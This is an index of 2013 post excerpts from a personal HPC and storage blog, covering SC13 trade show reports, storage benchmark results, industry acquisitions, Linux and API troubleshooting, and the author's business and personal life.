Continuing the work of the previous post, I looked into rewriting the serial code to run in parallel/vector data languages. My original supposition about what would make a good data language is now in doubt as a result. First, I used PDL in Perl. But its Perl, right? It can’t possibly be fast. That would be … like, I dunno … wrong? (yes, this is sarcasm). This completes the task in 12s.
Posts
Knights Landing
Over at InsideHPC, Rich has a short take on Knights Landing with a link to the longer article. This is implicitly the direction I thought things would be going in … drop in replacement CPUs to provide acceleration. Probably some big-small designs to handle OS tasks on specific cores (and reduce OS based jitter). This said, 2x such sockets gets you to 72 lanes of PCIe gen 3. A little light for us, but we’ll figure something out (our current units are more than this).
Posts
... and OCZ goes down
see here This is a chapter 7, dissolution, not a chapter 11 restructuring. Assets to be sold, likely to Toshiba.
I expect more of these from other vendors. SSD space has been needing a consolidation for a while. STEC purchased by WD, Smart by Sandisk has removed most of the high end of the market from the startup side. Pliant was grabbed by Sandisk previously. Whom else remains? On the low-midrange of the market, you have Intel, Micron, and a few others.
Posts
I guess no one at the beobash saw the 10% discount link ...
Basically, if you go to this site, provide your information, use the code “beobash13”, you get a nice discount on your next purchase from Scalable Informatics until the end of 2013. The rules are simple. Basically you provide your contact information, let us know what products you want to talk about, buy them and pay for them by the end of the year. We are offering something like a 10% discount for this.
Posts
Finally have a customer information page talking directly to zoho crm
This took a bit, as the API is documented, but wasn’t quite working for some reason. But now we’ve linked our signup page to drop data directly into zoho. This was made harder by the XML based API not working as documented. I posted a forum note, after searching on the forum for answers. Others had the same questions. I built a simple testing code, and it didn’t work. Posted this to the forum.
Posts
SC13: the Limulus boxen appear
[Disclosure: we do have a business relationship with Basement Supercomputing] (this is a longer version of the beowulf item I posted) Years ago, I came to the conclusion that there was no personal supercomputing market after we tried with a deskside system … what I called a “muscular desktop” with a great deal of IO, processing, ram, and graphics. We just could not find the right niche for this, and we were being badly undercut in price by the Dell-like companies of the world, selling low end boxes that were … good enough … for a small set of tasks.
Posts
SC13 observations
From a post to the beowulf list:
I didn’t get a chance to see many booths … I did get free the last hour of Thursday to wander, and made sure I got to see a few people and companies. What I observed (and please feel free to challenge/contradict/offer alternative interpretations/your own views) will definitely be colored by the glasses we wear, and the market we are in.
not so many chip companies (new processor designs, etc.
Posts
SC13 finale
That was a wonderful show. People got to see what we were about, our new appliances, our performance. I see many possibilities. This is good. Some key takeaways:
We have the fastest densest systems in market. Our usable performance far outpaces our nearest competitors configurations which are not in a reasonable config (hello … 60+ raw JBOD? or RAID0 … seriously? And no one has challenged them on this?) our partners rocked.
Posts
SC13: Day 2 wrap up
Day 1 was incredible. Day 2 topped day 1 by a fair amount. I had realized yesterday that I had forgotten to put up our speedometer website which pulled data directly from the siFlash hardware on the real IO performance. I had this unit running hard, and the IO operations were moving quite well. So I put up the web page on my laptop, and this is what we saw 30GB/S.
Posts
An apology
When I mess up, I don’t normally do it in a small way. I jump in hard, head first. I made an assumption about something I did not have all the facts about today, and began to tear into someone whom did not deserve this treatment, after making him wait for me at our booth. Yeah, this was a major screw up on my part. Addison, I hope you will forgive me, and accept my humble apology.
Posts
SC13 day 1 wrap up
A good day at the booth. The talks were well attended, and speakers and their topics were interesting. Our partners in the booth: Kx, Veristorm, Basement Supercomputing, Sandisk, XtremeData, and Inktank are phenomenal. We announced many new products, all on display at our booth, and the partners working with us on these products were there to talk about the applications. What we didn’t show off were the speedometers measuring the performance live on the systems.
Posts
Interesting article
I read this on Gigaom. In it, there is a claim of the densest storage on the market coming from Quanta, and a full rack of them would be about 3/4 ton (about 682 kg). Amazon uses a “special” design that comes in more than a ton according to the article. So I decided to look into what a simple 42U rack of say 10 of our bad boys would come out with weight wise.
Posts
Broken APIs and other time wasters
So I spent the day trying to figure out why my simple form submission which then generated an XML output, and then a subsequent post to Zoho CRM, did not, in fact, work. I was doing this without the Zoho code, just a description of their API. Its an older API, that much is obvious. You talk to it through XML. You post your XML. But you put parameters on the URI to control the post.
Posts
Sneak peek at UI atop RESTful API
This is our new, common UI across all machines, clusters, clouds, appliances, tiburon/Scalable OS … This one in particular is running atop our siRouter. More on that soon, but have a little gander.
[ ](/images/SOS-v1.png)
The UI is basically a “thin” layer atop the RESTful interface. And its a proper RESTful interface, none of this conflated GET where we mean POST/PUT and all that. More at SC13. I promise.
Posts
kvm incompatible with xfs
Just found this out by way of an experiment for a partner. Cool partner, cool product, running on our fast hardware for SC13. Problem is that I was seeing some very odd error messages when I tried to mount a volume stored in a file on an xfs based LUN. I could dd to the file. I could mkfs.ext* the /dev/vda. But the moment I tried to mount it, block errors.
Posts
BeoBash13: the revenge of the rampaging physics-turned-supercomputer geeks?
Or something like that. See here We’ll be there!
Posts
SC13 T-14 days
We will be at booth 1919. Please do come by and say hello. We’ll have coffee/tea (I think), a number of machines, great partners with a number of demos, and hopefully some talks on big data analytics in Financial Services, Parallel high performance databases, massive key-value storage and processing, as well as a few other bits. We’ll have a very cool box from one of our friends in the booth. We ship the machines at the end of this week, or beginning of next.
Posts
And then they fight you
We’ve been championing the tightly coupled storage and computing model for a long time. When it was unfashionable, when it was discarded as “this is something you should not do” by others “who knew better”. Now, the ideas, the concepts, the thoughts, the designs and implementations behind it are all around. Joyent’s Manta system is an implementation of the concept. Arguably, the more advanced MapReduce and Hadoop designs are also implementations … have the data right next to the processing, and provide gargantuan bandwidth locally to the data.
Posts
Cray acquires the IP assets and people of Gnodal
We used Gnodal units for the original Lucera system. Very nice devices with a few idiosyncrasies. Gnodal ran into some funding problems earlier this year, and had to find a buyer. Cray grabbed them and a number of the people involved. This is good for Gnodal and Cray. Gnodal has interesting technology. And Cray may be looking at how to leverage SDN for its system using this (wild guess on my part, I have no knowledge direct or indirect of their plans/intentions/…).
Posts
First distributed file system for STAC M3 benchmarks
We ran the STAC M3 on a Ceph based storage cloud appliance you will be hearing more about soon. The report should be up on the STAC site later this week. Here are some of the take-aways:
We chose Ceph for several reasons, but you should expect to see others very soon as well. Our Cluster and Cloud storage appliances are based upon our very powerful and very dense building blocks.
Posts
At the STAC Summit in NYC, presenting our Time Series Analytics Appliance
This was a good meeting in general. Lively panelists, focused panels, though somewhat vendor heavy in a number of cases. I have a sense of a “Gandhi” experience in progress from the parallel file systems panel. 4 vendors, one user. The user was fantastic, and the vendors were pushing most of their own stuff. One vendor in particular took some not too thinly veiled shots directly at us without naming us.
Posts
But, of course
So I ran out of space on my travel laptops small SSD. I wanted to update to a larger SSD, and I figured I’d move my partitions over and resize. But the gods would not allow for such an operation as they have in the past. Oh no. Upon switching out the 120 GB Intel SSD for the 240 GB SSD (spare unit we had), and putting the 120 GB SSD into a USB 3 holder, I discovered that a) the drive wouldn’t register with the machine most of the time (it errored out during SCSI plugin detection), or b) when it did detect properly, it wouldnt provide partitions I could copy off.
Posts
Our little time series analytical appliance is one fast monster
Running some burn in testing:
Run status group 0 (all jobs): READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, mint=43274msec, maxt=43274msec WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, mint=70059msec, maxt=70059msec More soon
Posts
This week past has been (mostly) incredible
Feeling not happy about my time away from my family, and not happy about Vipin’s time away from his, we still accomplished a great deal. Some unhappy things I still have to deal with, and I will soon. But this has been a great week. Look for some announcements around the SC13 show. We will have some nice things to talk about at our booth (#1919 , please do come and visit us there, we will have coffee, snacks, as well as our team, partners, and friends there!
Posts
And the benchmarks are out
Check out the official site for more info. Take home messages for the soon to be announced system
and
What is this magical beast you ask? What are its configuration limits? You’ll have to wait for the official unveiling.
Posts
New benchmark results imminent
Will update once they are released. I can’t tell you numbers within. I can say that we are quite happy with the results. More (very) soon. I promise.
Posts
Heh ...
[ ![](/images/eunuch programmers.jpg)
](http://www.businessinsider.com/scott-adams-favorite-dilbert-comics-2013-10)
Posts
This would be funny if it weren't sad
Over on the pfSense mailing list there is a serious level of tin-foil-hat (TFH) and rampant paranoia, coupled with extreme lack of etiquette on the part of the TFH brigade. And, to make it more enjoyable, at least one overt and humorous case of attempted cyber bullying against me personally for imploring people to stop hijacking a technical discussion list, as well as people decrying a faux oppression from people whom are genuinely wanting the list to return to its technical roots.
Posts
Starting to build the Tiburon Data Store
This is fun, basically something that I’ve wanted to do, and it gets me closer to the point where I’ve wanted to be for a while … building TREDS (Tiburon REliable Data Store). Code is up in the IDE, and I am building the CRUD and metadata portions now. If all goes well (it never does), we should be storing/retrieving objects soon. Very exciting …
Posts
More benchmarking goodness coming
A new round of industry standard benchmarks coming soon for some of our kit. Well, its technically our appliance built from that platform, but you’ll be hearing more on that soon. Very exciting times … you’ll hear more about this soon.
Posts
Moving more of our infrastructure to our dog food ...
Many of our functions are hosted on our Virtualization appliance. Our firewall is now running on a siRouter appliance. As always, our internal storage is JackRabbit, and our internal backup is DeltaV. We’ll be talking more about all of this in short order. Needless to say, I am quite pleased about this. [update] spoke too soon .. discovered a routing failure that was masked in the appliance. Reverting to the old setup until we can address.
Posts
Wonderful changes in Tiburon-RESTful
I’ve been rewriting Tiburon to provide a completely sane restful interface. It still does what it did before, but now … it does it so much more nicely! First: I got rid of the config file. Some folks were having trouble with JSON config files. Creating them is very easy, they are key value stores in 90% of the cases, with the remaining 10% being a “default” key, and then the value.
Posts
RESTful tiburon tagged
as Alaskan Malamute v0.10. I’m a dog guy, what can I say. Hopefully full boot server semantics will be done by end of weekend.
Posts
Starting to really enjoy using MongoDB as a document store
There are a few gotcha’s that I am working through. But apart from these (mostly oddities in the interface between Perl and MongoDB), this is making Tiburon RESTful development go much better. I’ve just started to scratch the surface of what the combined thing will do.
landman@lightning:~/work/development/tiburon/t$ ./version.pl result = $VAR1 = '{ "version" : "0.1", "label" : "Alaskan Malamute" }'; and
landman@lightning:~/work/development/tiburon/t$ ./list_boot_servers.pl result = $VAR1 = ' [ { "hostport" : "3001", "_id" : "523d540e9745f48429000000", "name" : "test1", "default" : "false", "hostname" : "10.
Posts
Ahhh ... the joy that is being used as a 2 by 4
I didn’t quite see this one in all its glory, but had an inkling that things were not as they appeared to be. Annoying, but one lives, learns, and continues. No details.
Posts
... and Nirvanix shutters ...
Traction, paying customers, revenue and cashflow are what matter to small businesses looking to grow up. In many ways we (the day job) were lucky as we built a sustainable business first, with real customers and real revenue. Most startups don’t do that. They have a change the world idea, and then try to evangelize this whilst building a business. Sometimes they have to “pivot” or … change focus to an idea that will work at turning into a business.
Posts
Worlds first low latency cloud
PR from the day job. Remember I’ve been dying to tell people about the ultra cool project we’ve been working on for the last year? Well, this is it. More soon, but I am thrilled we can talk about it now!
Posts
Why is Java used in teaching programming in high schools?
Seriously … My daughter is taking a computer class, and for reasons I cannot fathom, they are using an AP Java book (an old one at that, written when Java 5 was new), and more importantly and more concerningly, the Java language itself. I’ve got many qualms about using Java for teaching (or development, but thats for other posts). For new students, early exposure to its rigid and verbose … one might argue … excessively verbose … syntax and structure, don’t quite lend themselves to an understanding of how algorithms and computers work.
Posts
Slight annoyance with argument processing
Tiburon as a service. I’ll talk about this at some point, and describe what I mean, but I have to say that I’ve been blown away by the response to it from many places and customers. I’ve been working on making the API restful, and finally … finally … incorporating a noSQL DB on the back end to make the replication and other bits trivial. We are using MongoDB for this.
Posts
Bitten by VirtualBox yet again, moving to kvm
I like VirtualBox. Have for a long time. But it has some … well … interesting failure modes. Including some that have locked up my host machine. The problem for me is that I’ve got my Windows desktop environment for my normal desktop hosted there. And I need this every now and then. Today was the final straw. Working on a document about some of our updates in Word. I don’t like Word, but some of our partners use it, and its easier to use it than to fight the battle convincing them to use LibreOffice.
Posts
More M&A
Two items.
our friends at Virident are now part of WD. I am happy Kumar, Yatin and crew got a nice exit. I am not thrilled at where they landed. Virident joins STEC at WD. But as with STEC, this looks like this is on the HGST side of things, which appears to still be building separate and quality product. We will buy and ship HGST. Whiptail was acquired by Cisco.
Posts
Special at the party after HPC on Wall Street
The worlds first low latency drink to go with the next generation low latency cloud … the Scalable low latentini. Yes, its real …
Posts
Definitely having one of those days
Massive frustration on multiple fronts, and a few unwelcome surprises. I wish I had karate tonight, and fight night in particular. Lots to work off. I’ll have to be satisfied with weight training tomorrow, and a nice long dog walk tonight.
Posts
More M&A: Microsoft buys Nokia
This one was almost obvious, it was simply a matter of “when”. Microsoft is trying to put some wood behind its Mobile OS arrow. No one seems to want it, save for the 41MP camera “phone”. In the big picture, Microsoft saw the beginning of an erosion of its market power recently, as more people opted for mobile platforms, and fewer opted for PCs and laptops. There is a convenience and cost play going on at the same time.
Posts
Latest DeltaV benchmarks
24 bay system, big RAID6. Reads/write 4x RAM size.
[root@dv4-3 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data ... WRITE: io=65505MB, aggrb=1580.2MB/s, minb=1580.2MB/s, maxb=1580.2MB/s, mint=41433msec, maxt=41433msec READ: io=65505MB, aggrb=2429.4MB/s, minb=2429.4MB/s, maxb=2429.4MB/s, mint=26964msec, maxt=26964msec
Posts
Spot on discussion of a fake crisis
Over at IEEE Spectrum, there is a wonderful article that delves into the latest phase of the alleged massive need for more STEM workers. This is a topic I’ve covered a number of times, here, here, here, and here. TL;DR version for newbies: If someone is trying to sell you on this to get you to decide to go get an STEM degree, then there’s a pretty good probability you are in the process of being deceived.
Posts
Why I've not been posting
Just insanely busy, more so than usual. We are getting close to double digits in employees in the day job. I suspect we’ll cross this in September/October. More news soon, including some wonderful new partners, products, and business bits. I won’t say where at this moment, but you can start searching around for the SI logo on a few folks sites …
Posts
Entrepreneurs are optimists
This is something I’ve been meaning to write about for a while. There are many reasons one might decide to be an entrepreneur. For me the journey was fairly simple. In graduate school, I saw the sea change in my field with the influx of FSU scientists with much greater seniority, many more publications, etc. taking up postdoc and tenure track positions around the time I finished up. I knew I had to alter my vision of what I wanted to do in my professional career, and happily SGI came along and gave me the opportunity to spend time in industry.
Posts
Day job at HPC on Wall Street
Ok, this is getting to be a common theme. We go to HPC on Wall Street. We show off new kit. And we are hosting a party. Go figure. There will be more on this very soon. You will see the new kit at our new large booth at SC13. The first element of the new kit is a software defined networking powerhouse behind a new global financial cloud. The group building out the cloud will be there with us, ready to talk to people about what they are doing, and why financial types should sign up for this cloud.
Posts
NextIO shuts its doors and liquidates
As seen here and here.
There are lessons to be learned, and wisdom had from the articles. As the founder noted
Posts
bitten yet again by ancient packages in CentOS (and RHEL)
This is not a CentOS issue in that they merely rebuild the RHEL sources without the copyrighted bits. But its getting to the point where the RHEL bits are so badly out of date, that the platform is rapidly getting to the point of unusability. When I have to rebuild packages from source, as no up-to-date patched source RPM or even binary RPM exists for little used packages such as, I dunno … apache?
Posts
how not to write driver Makefiles or configuration scripts
if [uname -r eq ...] Its very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I’ve seen this on network cards, RAID cards, you name it. It increases your support load, decreases the likelihood that you can actually support whats out there … say for example, someone does a ‘yum update’ and gets an updated kernel.
Posts
A cri de couer for Perl
As seen here. I enjoy developing code in Perl. I know, I know, its “the write only language” and “looks like line noise”. It has endured some rather nasty FUD in its day, and yet, it keeps on growing in use. It is just an incredibly powerful, quite expressive language. One which enables you to write very terse code if you wish. But the presentation isn’t concerned with terseness, but with development into a modern programming language.
Posts
The day job is 11 years old
Last year, I had been incensed at this time, by a US presidential candidate and mindset from him who told me, and every other entrepreneur out there, that “we didn’t build it”. It was a foolish thing for him to say, foolish for his party and fellow travelers to echo. Yet echo it they did. I quietly promised myself to double down on my hard work, the work I did, and see if I could smash the previous years smashing financial records.
Posts
and the M&A accelerates
NVidia grabs the Portland Group. This makes sense, as NVIdia has had CUDA, which is LLVM based, and needed a more general purpose compiler technology. There is nothing wrong with CUDA, but its very GPU specific. PGI tech allows them to talk very generally, and get support for non-GPU hardware acceleration. Such as massive collections of ARM. I expect more M&A; and investment activity over the next few months.
Posts
One of the joys of running a company
… is when large multi-hundred million or multi-billion dollar public companies try to ignore “small” bills from smaller than multi-hundred million dollar companies. Very much related to this. We are operationally funded. Every dollar I pay my team with comes from cash flow. So when companies try to cheat us out of money by not paying their bills, and then ignore our requests for payment … Yeah, this gets old. I prodded a reseller on this pretty hard today.
Posts
Dear NSA PRISM folks, we have a problem we need your help with
A scammer has been spoofing the day job’s number for the last year and a half. We’ve have been trying … very hard … to get anyone at all, to cooperate with us to try to find out whom these losers are, so we can take them out. We have had no luck. No one wants to help. No one. Even execs at phone companies. Go figure. One kid called last year so incensed that his mother was targeted by the scammers that he said he was going to get a gun and go meet with these jokers.
Posts
M&A roundup
I’ve not reported it, but STEC was acquired by Western Digital. STEC has been one of the day job’s partners for high performance SSD technology. Unfortunately, we’ve not had great luck with WD in the past. Even gone so far as to recall/replace specific models from every machine shipped globally with those drives, due to very high failure rates, and a complete unwillingness on the part of WD to either admit defective firmware, or RMA defective drives.
Posts
ISC13 video
[vacation edition: posted from an undisclosed location somewhere off 9A in Fishkill NY, after leaving a really bad airbnb experience in Scarsdale NY] Here Russell from Scalable Informatics and Rich from InsideHPC (check em out!) talk about STAC M3 benchmarks, siCloud (aka ‘the beast'), and some of the capability class tests we ran. More later, but I am on vacation …
Posts
Very fast cloud scale tightly coupled computing and storage
I’ve been hinting at, and alluding to a benchmark we (the day job) ran on a new product for a while. I took a month to rerun these tests, verifying everything. I wanted to make sure that we got this right. Because these are big numbers. Then we sat on it for another month. Give us time to reflect, what will people’s reaction be? We slowly leaked a few pointers to people.
Posts
Contemplating replacing the whole init script for stateless booting
Its probably fair to say that CentOS/RHEL startup mechanism is, well, broken beyond repair for anything but trivial cases. Out of the box, NFS root doesn’t work, and its very … extraordinarily … hard … to make it work. iSCSI and other connection mechanisms don’t work. This has been the case since 6.0. 6.4 continues the long tradition of working for trivial cases, and not working for anything remotely more interesting.
Posts
Two screwups in two days
So the day job released some PR. I paid attention to the content, but not to the title. Unfortunately should have. We set records for the 2.8 version of kdb+. The title suggests otherwise. Call this a Mea Culpa, as I had approved the content before I saw the new results with the 3.1 version. So the PR went out, and I think I’ve got egg on my face :( .
Posts
Crazy travel schedule ahead
Off to Chicago tonight to present at the STAC Summit tomorrow. Then meeting customers on Wednesday, phone calls, and a partner event. Thursday, back to Detroit, then I fly out to NYC to meet customers on Friday. Back Saturday morning for our national karate tournament (and I am very behind in my practice) for our style. Then Sunday back to NY to present Monday at the STAC Summit in NYC. Back to Detroit on Tuesday, then Friday, in theory, I have a 10 days off for vacation.
Posts
You can get a hint of the big test result by watching the rotating banner on the day job home page
Though the 11 was changed to a 12. That is being reverted. Day job home page is here. As it scrolls by, think “Massive, unapologetic, firepower”. Writ large. This would pair well with any top500 or !top500 computing system. More to come … more … to come !!!
Posts
STAC M3 Audited report is now published
See here. Take home message Delivered the fastest response time in the NBBO benchmark compared to all publicly disclosed results to date for all systems (STAC-M3.?1.1T.NBBO.LAT2) Delivered the fastest WRITE results compared to all publicly disclosed results for all systems (STAC-M3.v1.1T.WRITE.LAT2). Among systems using kdb+ 2.8: This system set new records for 5 of the 17 benchmarks (STAC-M3.?1.1T.NBBO.LAT2, STAC-M3.v1.1T.WRITE.LAT2, STAC-M3.?1.10T.STATS-AGG.LAT2, STAC-M3.?1.10T.STATS-UI.LAT2,STAC-M3.?1.1T.STATS-UI.LAT2). Delivered over 2x the performance of the previous best published results for the MKTSNAP benchmark, among systems using spinning disk or flash storage.
Posts
The big test to which I've alluded
… finalizing the text on this, link up soon (its up but hidden from view). The response from people who’ve seen it has been awesome. More very soon. Today, I hope.
Posts
STAC M3 benchmarks to be published tomorrow
I’ve got a few things to add to the report today, and then we will have the STAC group publish the report. Performance is … er … very … very … good. A few tests which won’t favor our design as compared to massively wide striped disks were better on other kit. But I am blown away at how our little 2 socket server did in comparison to other, better known kit.
Posts
Finally fixed the day job DNS
This took far longer than it should have. This was in part due to my initial decision (since changed) to use dbndns at two sites (one internal, one in the cloud). The TL;DR version. dbndns and its parent project, djbdns, are a royal pain to get up, operational, stable. I tried the packaged versions, the source, etc. Several different distributions (CentOS 6.x , Ubuntu 12.04, …). 4 weeks into this mess, I asked myself the critical question.
Posts
Article on a likely causation vector for global warming
I am not a huge fan of the science and accompanying rhetoric around “global warming.” And its not because the Koch brothers (or any other weapons grade conspiracy theory idiocy on the part of certain activist elements of our society). Its because the “science”, or more precisely, the theory that currently holds sway in large swaths of academia, and public policy circles appears to generate testable hypotheses that are not matched against empirical observations.
Posts
Wish I was going to ISC13
I was … but then it was determined that I needed to be giving 2 of the STAC summit talks in Chicago and NY on the day jobs’s systems. Then this week, Tianhe-2 info came out, and … well … WOW! Great job guys! (ob-day job: “could we interest you in some monsterously fast storage to go with that space-time fabric warping super?") I was speaking recently with a VC we had talked to in early 2002 about accelerators.
Posts
Should be able to talk about the benchies early next week
Got confirmation from marketing folks that I won’t cause irreparable damage if I just put the link up. Next week. Early.
Posts
New posts up at the day job blog, and yes, we now have a day job blog!
See here: ( http://scalableinformatics.com/blog/ ) The way I looked at it, I needed a place to talk more product/solutions/work without having my own personal opinions on myriads of things weave throughout. That is, scalability.org is something of mine personally, that I write for, based upon whatever itch I wish to scratch. The blog at the day job lets us (collectively) talk about cool things without having that “me/mine” thing intermix. I’ll be updating here of course as well.
Posts
What an intense 3 weeks
I can’t talk publicly about everything yet, just its been so demanding of my time. I’ve run and debugged benchmarks, flown in to meet customers and others, generated many quotes, given many presentations. In this, I’ve got two hard deadlines for getting stuff written that I have to do before I can write anything here. So let me crank on those in the next 24 hours, and I’ll update.
Posts
What would you do if you had "infinite" bandwidth and IOPs coupled directly to your computing?
Imagine you have some … I dunno … gargantuan amount of bandwidth available, to and from your disks. And you have just positively insane IOP rates, at these very high bandwidths. And then you tightly couple a few hundred processor cores, and a few terabytes of memory. What would you consider “gargantuan” bandwidth? What would you consider “insane” IOP rates? And most importantly, if you had the type of IO fire power you considered gargantuan and insane, what would you do with this?
Posts
Having fun writing a presentation about molecular dynamics and big data
Who’da ever thunk that MD simulations would start to become large enough to present IO and analysis problems? Way way back when the digital supercomputing dinosaurs roamed the earth, looking for problems to crunch on, I simulated gallium arsenide on some of these machines. I’d be lucky to get 100 time steps done, in a week, for 64 atoms. 64 atoms in double precision, with position, velocity, and atom type, lets be generous and call this 64 bytes in binary or 80 bytes, one terminal line, per atom in text.
Posts
Why I am taking a while to post the results
In short, I am trying to verify what we measured. Its repeatable, I’ve been measuring it for a week now, and having trouble with it, but I want to make absolutely sure I get this correct. Because these are big numbers. Very. Very. Big. It would be annoying if I made a mistake. So I am double/triple/quadruple checking.
Posts
Social Media Overload
Definition: When the amount of social media that everyone expects you to consume with a myriad of different, incompatible, and often annoying apps, absorbs so much of your time that your productivity drops … you decide that in the interests of your own personal sanity, you will spend more time with your family, your dog, and your friends, than dealing with {facebook,twitter,linkedin,RANDOM_SOCIAL_MEDIA_NAME} streams which steal time from the important things in life.
Posts
It must be some obscure law of nature
… whereby when I have the least time to spend on a particular task, there is an ordering of requests that I maximize the time spent on that task using the least efficient mechanisms possible. Put another way, when I am busy, more people seek more of my time to handle things that I shouldn’t need to be involved in. Or another way … simple things should be trivial, complex things possible, and yet the universe appears to arrange it self so that simple things become complex, and complex things become impossible.
Posts
Back with some benchmarks for siCloud
For the day job. They are … well … pretty nice. What is siCloud you might ask? Well, think a very … very fast storage and computing cloud, leveraging many technologies we’ve developed. You will be hearing more about this soon. And I’ll show some numbers and pictures in another post. But before I get them up, anyone want to hazard a guess on the aggregate bandwidth and IOP rate for this system?
Posts
Again, terribly busy
Have an order which is absorbing all of my cycles, and this is coupled with a nice springtime cold, and an elbow injury. Now if my dog bites me, my month will be complete. Will start posting soon, once I get the the burn-in running. To give you a sense of the size of this order, we are installing additional power and AC capacity in our lab (its happening now). We just asked our landlord if they have a larger space in this complex (its built into our lease, as we weren’t sure of our growth rates), and they really don’t have anything we can use, so we might just suffer here for another year, and build up capacity in NJ.
Posts
Off to HPC on Wall Street
Looking forward to this. Our booth is smaller, but in a higher traffic area. We have 2 systems with us, a siFlash and a 60 bay JackRabbit. And we are putting together a small get-together after the show. This should be fun. I am looking forward to it. I’ll try to tweet from the show floor.
Posts
You think I would learn already
Its called “fractured bone spur tip of olecranon”. It means I’ve got a broken bone in my elbow area. My arm is in a sling and immobilized. Got it while sparring at a karate tournament. Landed hard on my elbow due to a slippery floor. Of course its my right arm, the one I write with. I am typing this with one hand, using the hunt and pick method. Seriously need voice IO for machines.
Posts
Products versus projects
Long ago I pondered
Projects, inherently, are un-finished entities. There are missing things. There are “un-implemented features” which would be necessary for a product. Like say, an on-off switch, among other things. Products are inherently compromises between design, realities of implementation costs/schedules/complexities, etc. Software developers often get into the endless cycle of tweaking features and improving systems so that they miss target dates. We see this with larger scale projects as well, unless someone adopts the iron-fist rule on adding/tweaking versus shipping/learning/improving $version++.
Posts
Windows 8 is terrible
No, thats unfair to things that are truly terrible. It sets a low mark … a really … really … low mark. Trying to help a relative with adding a printer. A printer that happily works under windows 7. No issues, just works. Works under Linux on my laptop here. Nothing special, just works. But windows 8? Oh … no … it … doesn’t. Drivers (the built in ones we are told to use) don’t work.
Posts
This simply needs to be said ... Networkmanager must be neutered
It should never, ever be enabled by a default install on a server. Ever. Under any circumstances. For any reason. I’d even argue it should never be installed by default for any reason on a server. Just fixed another NetworkManager-caused problem (TM). Modifying /etc/resolv.conf on a server after I changed the NICs as indicated. I mean … seriously folks?
Posts
Failing 10GbE NICs
I won’t mention vendor by name here. Needless to say, I am unhappy with the failure rate on their NICs. We had a number of units we bought for internal use as well as for customer use. The NICs would throw various driver exceptions, and kernel panic the machines. It was doing this to our central server this past week, while I had been lighting up kvm’s on an app server, specifically kernel panicking under even moderate load.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Posts
Time wasting phone call detector regex
So there you are, sitting at your desk trying to do your work. A call comes in, you pick it up. Me: $day_job, Landman speaking Them: I would like to speak to (garbled) about (garbled) meta-Me: [start 15 second BS detector clock filter] Me: I’m sorry, I can’t hear you … who are you and what is this call about? Them: (barely audible) I am XYZ PDQ representing ABC DEF, and how is your day going?
Posts
There are no silver bullets
… and anyone promising you one is selling you something. This is true everywhere, though especially so in massively overhyped markets. There are no secret incantations that will tease actionable insights out of gargantuan bolus of data. Yet, from all the “company X now has a hyper optimized, purple colored Hadoop distro, with a pony” announcements, one might think that it was a panacea … a panopticon with infinite ability to extract the most profound and profitable nuggets from mountains of steaming piles of bits.
Posts
A replacement laptop for my daughter
Her old Dell Inspiron died, again. First it was a motherboard. Then a hard disk. And a cracked bezel. Now it looks like its a motherboard again. The power supply bits are, IMO, completely unforgivable. Until Dell lets us use a replacement supply that is not manufactured by Dell, we won’t be buying Dell laptops. I suspect this will be a while. But this laptop, and my wife’s version, have lots of problems.
Posts
Reaching saturation: Our ongoing glut of Ph.D. educated talent
Achieving a Ph.D. is one of the highest academic goals one can set. You work insanely hard, you sacrifice income, starting a family, and many other things, in the pursuit of this (in most cases). And when you finish, you are, theoretically, in an upper strata of accomplishment. Many (including myself) entered into this path, decades ago, based upon (now known to be either overtly falsified, or completely incompetently analyzed) data which suggested a dearth of scientists needed to staff the ever growing colleges and universities departments, and the massively growing industrial scientific community, as a solid rationale for pursuing such a difficult course.
Posts
Why posting has been slow
Time. Basically I have none. I steal some here and there to get things out, but I have been completely swamped. Or I post when I am up late at night/early morning, and can’t get to sleep (occasional hazard of running a growing business). On a happy note, the company is growing. We have brought 4 people on board over the last six months, with an additional 2-4 planned near term.
Posts
As the clouds change ...
This is going to take a few paragraphs to set up, to please bear with me. One of the harder aspects to building a business atop someone else’s platform is a fundamental dependency upon them that you create. Your business depends, to a very large extent upon their good will, and their desire to grow an ecosystem. Every now and then you get more predatory platform providers. These groups like to take control of larger segments of ecosystem, and provide a product or service that gets harder for others to compete with, because, in part, they are naturally disadvantaged in doing so.
Posts
ATI experiment update: day 19
So here I am, with an ATI W5000 card driving my dual display Linux desktop. I had pulled the NVidia GEForce card, as the driver or the card kept tossing Xid: NVRM errors, that I could not make go away. Googling this error took me back to years of people dealing with similar issues, and never getting a fix. Just reporting the same problem. That was very annoying. The day job has customers with these cards … exactly what are we supposed to be telling them?
Posts
[Updated] #walkingspam that you cannot easily filter electronically
[update] Ok, this was amusing. An SEO group commented with a link back to their SEO site. Our spam filter caught it. (/shakes head) We had the most … well … interesting event happen at the office a few days ago. You know how, in your spam filtered email you get hundreds or thousands of items with wording something like this: If you were my Client you would be # 1 on Google or I can make you # 1 on Google in 3 Weeks.
Posts
A lightly ARMed JackRabbit 60 bay unit
This is 8x nodes (2x EnergyCards) of Calxeda goodness. We expect to be able to show off (and demo!) a live, more heavily ARMed unit shortly.
[ ](/images/ARMed_JackRabbit.jpg)
Posts
Putting a 60 bay JackRabbit through some basic tests
Basic (conservative) configuration of the day jobs' high performance tightly coupled storage system, no SSDs (apart from the OS drives). RAID6 LUNs, no RAID0’s. This is spinning rust folks. Nothing but spinning rust. In a realistic configuration. And no, we haven’t yet begun to tune this. Streaming writes, 1 thread per LUN:
Run status group 0 (all jobs): WRITE: io=1279.5GB, aggrb=5944.6MB/s, minb=5944.6MB/s, maxb=5944.6MB/s, mint=220405msec, maxt=220405msec 5.9 GB/s sustained writes for this case.
Posts
karma?
On this blog, I’ve pointed out the failings of many others. I’ve hinted at having to take ownership for others failures as the customer sees us, and not the people behind us (often messing with us). Our job is, among many other things, to hide that silliness away from them so they can focus upon their issues. This is not to say we/I don’t mess up. Most of the time its minor.
Posts
Getting out of Dodge
